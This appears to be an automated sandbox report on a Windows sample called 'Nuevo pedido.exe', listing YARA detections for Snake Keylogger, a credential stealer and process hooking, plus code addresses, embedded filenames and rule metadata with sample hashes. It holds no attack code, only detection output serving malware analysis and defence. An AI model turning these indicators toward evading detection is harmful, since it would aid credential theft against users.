Source: 0.2.Nuevo pedido.exe.395fa18.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 10.2.QGVhHsAOjb.exe.4180700.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 10.2.QGVhHsAOjb.exe.4180700.2.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 10.2.QGVhHsAOjb.exe.413c4e0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 10.2.QGVhHsAOjb.exe.4180700.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 10.2.QGVhHsAOjb.exe.413c4e0.1.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 10.2.QGVhHsAOjb.exe.413c4e0.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.Nuevo pedido.exe.395fa18.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.Nuevo pedido.exe.395fa18.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.Nuevo pedido.exe.395fa18.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 10.2.QGVhHsAOjb.exe.4180700.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 10.2.QGVhHsAOjb.exe.4180700.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 10.2.QGVhHsAOjb.exe.4180700.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 10.2.QGVhHsAOjb.exe.413c4e0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 10.2.QGVhHsAOjb.exe.413c4e0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 10.2.QGVhHsAOjb.exe.413c4e0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.Nuevo pedido.exe.391b7f8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.Nuevo pedido.exe.391b7f8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 0.2.Nuevo pedido.exe.391b7f8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0000000E.00000002.4135978280.0000000000429000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000000.00000002.1732037353.000000000391B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0000000A.00000002.1779228212.000000000413C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: Nuevo pedido.exe PID: 7288, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: QGVhHsAOjb.exe PID: 7900, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: QGVhHsAOjb.exe PID: 8116, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown

Source: C:\Users\user\Desktop\Nuevo pedido.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\Nuevo pedido.exe	Code function: 0_2_02670473	0_2_02670473
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Code function: 0_2_02670478	0_2_02670478
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Code function: 0_2_02670040	0_2_02670040
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Code function: 0_2_0275D5BC	0_2_0275D5BC
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Code function: 0_2_06F33698	0_2_06F33698
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Code function: 0_2_06F34548	0_2_06F34548
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Code function: 0_2_06F34210	0_2_06F34210
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Code function: 0_2_06F30040	0_2_06F30040
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Code function: 0_2_06F30F00	0_2_06F30F00
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Code function: 0_2_06F3368B	0_2_06F3368B
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Code function: 0_2_06F354F8	0_2_06F354F8
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Code function: 0_2_06F34538	0_2_06F34538
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Code function: 0_2_06F35508	0_2_06F35508
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Code function: 0_2_06F332E0	0_2_06F332E0
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Code function: 0_2_06F332D0	0_2_06F332D0
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Code function: 0_2_06F34201	0_2_06F34201
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Code function: 0_2_06F3F378	0_2_06F3F378
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Code function: 0_2_06F3F367	0_2_06F3F367
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Code function: 0_2_06F33080	0_2_06F33080
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Code function: 0_2_06F33070	0_2_06F33070
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Code function: 0_2_06F30006	0_2_06F30006
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Code function: 0_2_06F31E10	0_2_06F31E10
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Code function: 0_2_06F30E10	0_2_06F30E10
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Code function: 0_2_06F31E00	0_2_06F31E00
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Code function: 0_2_06F32CD8	0_2_06F32CD8
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Code function: 0_2_06F32CC9	0_2_06F32CC9
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Code function: 0_2_06F3DCBF	0_2_06F3DCBF
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Code function: 0_2_06F31C50	0_2_06F31C50
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Code function: 0_2_06F30D8A	0_2_06F30D8A
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Code function: 0_2_06F36D88	0_2_06F36D88
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Code function: 0_2_06F36D78	0_2_06F36D78
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Code function: 0_2_06F3D878	0_2_06F3D878
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Code function: 9_2_02F7D28B	9_2_02F7D28B
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Code function: 9_2_02F75383	9_2_02F75383
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Code function: 9_2_02F7A088	9_2_02F7A088
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Code function: 9_2_02F7C146	9_2_02F7C146
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Code function: 9_2_02F77118	9_2_02F77118
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Code function: 9_2_02F7F618	9_2_02F7F618
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Code function: 9_2_02F7C738	9_2_02F7C738
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Code function: 9_2_02F7CA1B	9_2_02F7CA1B
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Code function: 9_2_02F769A0	9_2_02F769A0
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Code function: 9_2_02F7E988	9_2_02F7E988
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Code function: 9_2_02F7CFBB	9_2_02F7CFBB
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Code function: 9_2_02F7CCEB	9_2_02F7CCEB
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Code function: 9_2_02F7C47B	9_2_02F7C47B
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Code function: 9_2_02F73A24	9_2_02F73A24
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Code function: 9_2_02F729EC	9_2_02F729EC
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Code function: 9_2_02F7E97A	9_2_02F7E97A
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Code function: 9_2_02F73E09	9_2_02F73E09
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Code function: 9_2_06D848D0	9_2_06D848D0
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Code function: 9_2_06D8C958	9_2_06D8C958
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Code function: 9_2_06D8B718	9_2_06D8B718
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Code function: 9_2_06D8BE70	9_2_06D8BE70
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Code function: 9_2_06D8A070	9_2_06D8A070
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Code function: 9_2_06D8A060	9_2_06D8A060
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Code function: 9_2_06D8EF48	9_2_06D8EF48
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Code function: 9_2_06D8EF38	9_2_06D8EF38
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Code function: 9_2_06D848C1	9_2_06D848C1
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Code function: 9_2_06D8F7F8	9_2_06D8F7F8
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Code function: 9_2_06D8F7E8	9_2_06D8F7E8
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Code function: 9_2_06D8B708	9_2_06D8B708
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Code function: 9_2_06D8F391	9_2_06D8F391
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Code function: 9_2_06D8F3A0	9_2_06D8F3A0
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Code function: 9_2_06D8BE60	9_2_06D8BE60
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Code function: 9_2_06D83DCF	9_2_06D83DCF
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Code function: 9_2_073700BD	9_2_073700BD
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Code function: 9_2_07372F18	9_2_07372F18
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Code function: 9_2_07374468	9_2_07374468
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Code function: 10_2_02F0D5BC	10_2_02F0D5BC
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Code function: 10_2_050E0478	10_2_050E0478
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Code function: 10_2_050E0473	10_2_050E0473
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Code function: 10_2_050E0040	10_2_050E0040
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Code function: 10_2_050E4BD0	10_2_050E4BD0
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Code function: 10_2_07673698	10_2_07673698
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Code function: 10_2_07674538	10_2_07674538
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Code function: 10_2_07674210	10_2_07674210
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Code function: 10_2_07670040	10_2_07670040
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Code function: 10_2_07670D8A	10_2_07670D8A
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Code function: 10_2_07675740	10_2_07675740
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Code function: 10_2_0767368A	10_2_0767368A
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Code function: 10_2_07675508	10_2_07675508
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Code function: 10_2_076754F8	10_2_076754F8
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Code function: 10_2_0767F378	10_2_0767F378
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Code function: 10_2_07674201	10_2_07674201
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Code function: 10_2_076732E0	10_2_076732E0
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Code function: 10_2_076732D0	10_2_076732D0
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Code function: 10_2_07673070	10_2_07673070
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Code function: 10_2_07670006	10_2_07670006
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Code function: 10_2_07673080	10_2_07673080
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Code function: 10_2_07671E00	10_2_07671E00
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Code function: 10_2_07670E10	10_2_07670E10
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Code function: 10_2_07671E10	10_2_07671E10
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Code function: 10_2_07676D78	10_2_07676D78
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Code function: 10_2_07676D88	10_2_07676D88
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Code function: 10_2_07672CC9	10_2_07672CC9
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Code function: 10_2_08BD51C8	10_2_08BD51C8
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Code function: 10_2_08BDE110	10_2_08BDE110
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Code function: 10_2_08BD8156	10_2_08BD8156
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Code function: 10_2_08BDDC87	10_2_08BDDC87
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Code function: 10_2_08BDEC08	10_2_08BDEC08
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Code function: 10_2_08BD4FC8	10_2_08BD4FC8
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Code function: 10_2_08BDF8B8	10_2_08BDF8B8
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Code function: 10_2_08BDF398	10_2_08BDF398
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Code function: 10_2_08BDEBF8	10_2_08BDEBF8
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Code function: 10_2_08BDF358	10_2_08BDF358
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Code function: 10_2_08BD8C88	10_2_08BD8C88
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Code function: 14_2_03055370	14_2_03055370
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Code function: 14_2_0305D278	14_2_0305D278
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Code function: 14_2_03057118	14_2_03057118
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Code function: 14_2_0305C146	14_2_0305C146
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Code function: 14_2_0305A088	14_2_0305A088
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Code function: 14_2_0305C738	14_2_0305C738
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Code function: 14_2_0305F618	14_2_0305F618
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Code function: 14_2_0305C468	14_2_0305C468
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Code function: 14_2_0305CA08	14_2_0305CA08
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Code function: 14_2_0305E988	14_2_0305E988
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Code function: 14_2_030569A0	14_2_030569A0
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Code function: 14_2_0305CFAB	14_2_0305CFAB
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Code function: 14_2_0305CCD8	14_2_0305CCD8
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Code function: 14_2_0305E97B	14_2_0305E97B
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Code function: 14_2_030529E0	14_2_030529E0
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Code function: 14_2_03053E09	14_2_03053E09
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Code function: 14_2_075500F9	14_2_075500F9
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Code function: 14_2_0755427D	14_2_0755427D
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Code function: 14_2_07554280	14_2_07554280
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Code function: 14_2_07552D30	14_2_07552D30
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Code function: 14_2_07552D20	14_2_07552D20

Source: Nuevo pedido.exe, 00000000.00000002.1737310691.0000000007150000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameFGMaker.dll2 vs Nuevo pedido.exe
Source: Nuevo pedido.exe, 00000000.00000002.1738497870.000000000AFA0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs Nuevo pedido.exe
Source: Nuevo pedido.exe, 00000000.00000002.1730142640.00000000028B1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameFGMaker.dll2 vs Nuevo pedido.exe
Source: Nuevo pedido.exe, 00000000.00000002.1732037353.000000000391B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs Nuevo pedido.exe
Source: Nuevo pedido.exe, 00000000.00000002.1727384619.0000000000BCE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs Nuevo pedido.exe
Source: Nuevo pedido.exe, 00000000.00000000.1669017064.000000000052A000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamehEab.exeD vs Nuevo pedido.exe
Source: Nuevo pedido.exe, 00000000.00000002.1730142640.000000000294D000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs Nuevo pedido.exe
Source: Nuevo pedido.exe, 00000009.00000002.4135978589.0000000000446000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameRemington.exe4 vs Nuevo pedido.exe
Source: Nuevo pedido.exe, 00000009.00000002.4157019650.0000000009019000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILET vs Nuevo pedido.exe
Source: Nuevo pedido.exe	Binary or memory string: OriginalFilenamehEab.exeD vs Nuevo pedido.exe

Source: Nuevo pedido.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 14.2.QGVhHsAOjb.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 14.2.QGVhHsAOjb.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 14.2.QGVhHsAOjb.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.Nuevo pedido.exe.395fa18.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.Nuevo pedido.exe.391b7f8.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.Nuevo pedido.exe.391b7f8.1.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.Nuevo pedido.exe.391b7f8.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.Nuevo pedido.exe.395fa18.2.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.Nuevo pedido.exe.395fa18.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 10.2.QGVhHsAOjb.exe.4180700.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 10.2.QGVhHsAOjb.exe.4180700.2.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 10.2.QGVhHsAOjb.exe.413c4e0.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 10.2.QGVhHsAOjb.exe.4180700.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 10.2.QGVhHsAOjb.exe.413c4e0.1.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 10.2.QGVhHsAOjb.exe.413c4e0.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.Nuevo pedido.exe.395fa18.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.Nuevo pedido.exe.395fa18.2.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.Nuevo pedido.exe.395fa18.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 10.2.QGVhHsAOjb.exe.4180700.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 10.2.QGVhHsAOjb.exe.4180700.2.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 10.2.QGVhHsAOjb.exe.4180700.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 10.2.QGVhHsAOjb.exe.413c4e0.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 10.2.QGVhHsAOjb.exe.413c4e0.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 10.2.QGVhHsAOjb.exe.413c4e0.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
